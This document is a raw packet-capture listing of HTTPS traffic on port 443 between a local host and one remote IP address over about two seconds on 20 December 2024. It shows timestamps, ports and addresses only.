                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.538181067 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.538461924 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.694427967 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.701250076 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.701540947 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.701555014 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.701601982 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.701616049 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.701630116 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.701669931 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.708101988 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.713437080 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.716898918 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.717092037 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.743443966 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.809649944 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.857825994 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.857851982 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.862744093 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.863162041 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.863184929 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.863291025 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.863306046 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.863332987 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.863410950 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.863425016 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.863437891 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.868602991 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.868875027 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.869013071 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.869046926 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.869060993 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.869074106 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.869086027 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.869752884 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.892786026 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.022430897 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.035738945 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.035845995 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.035900116 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.035916090 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.036042929 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.036061049 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.036075115 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.036091089 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.036150932 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.036164999 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.036179066 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.036201000 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.036226988 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.036386013 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.055291891 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.055752993 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.055767059 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.055780888 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.055881977 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.055896044 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.055908918 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.055929899 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.055943966 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.056066990 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.056545973 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.057831049 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.057945013 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.057957888 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.057971001 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058079958 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058092117 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058105946 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058120966 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058244944 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058259964 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058598995 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058737993 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.063199997 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069068909 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069159985 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069174051 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069227934 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069242001 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069256067 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069350958 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069418907 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069442987 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069457054 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069880962 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.071491003 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083329916 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083343983 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083357096 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083431959 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083445072 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083528996 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083542109 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083555937 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083698034 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083710909 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083724022 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.088613987 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090488911 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090517998 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090532064 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090663910 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090677977 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090691090 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090704918 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090816021 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.093873024 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.184144974 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.189264059 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.189279079 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.189291954 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.189455032 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.189466953 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.190053940 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.198096037 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.207031012 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.213155031 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.213421106 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.213865995 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.213879108 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.213893890 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214004993 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214019060 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214031935 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214046001 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214204073 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214216948 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214231968 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214935064 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.224628925 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.260781050 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.374779940 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.377293110 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.383354902 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.383492947 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.383528948 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.383627892 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.383681059 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.384026051 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.388133049 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.391741037 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.393728018 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.394026995 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.394083977 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.394119024 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.394153118 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.394188881 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.394212961 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.394973040 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.395143032 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.395179987 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.396442890 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.396478891 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.396853924 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.402568102 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.407434940 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.407603025 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.407613993 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.407759905 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.407772064 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.407783985 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.407799006 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.407805920 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.407885075 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.407924891 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.407937050 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.408102989 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.411514997 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.413850069 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.415980101 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.415992022 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.416112900 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.416126013 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.416205883 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.416275978 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.416287899 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.443681002 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.515352011 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.521085024 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.521276951 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.521337032 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.521394968 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.521404982 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.550328970 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.550761938 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.554150105 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.705887079 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.712728024 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.713032007 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.713157892 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.713232040 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.713248968 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.713336945 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.713352919 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.713370085 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.713392019 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.713531971 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.713553905 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.713573933 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.714200020 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.725250006 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.725483894 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.725753069 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.731614113 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.731749058 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.731829882 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.731878996 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.731888056 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.732002020 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.732091904 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.732111931 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.732146978 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.732165098 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.732180119 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.732280016 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.732294083 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.732438087 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.744117975 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.744211912 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.744229078 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.744287014 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.744342089 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.744359016 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.744453907 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.744504929 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.744522095 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.744585991 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.744857073 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.773468971 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.793730974 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.795862913 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.810719013 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.830713034 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.831190109 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.860434055 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.870727062 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.876679897 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.876924038 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877027988 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877091885 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877152920 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877170086 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877259970 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877285004 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877310038 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877325058 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877340078 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.908889055 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.052409887 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.084285975 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.107939005 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.115099907 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.115124941 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.115139961 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.115154982 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.115348101 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.115361929 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.115463972 CET65014443192.168.2.623.209.72.43
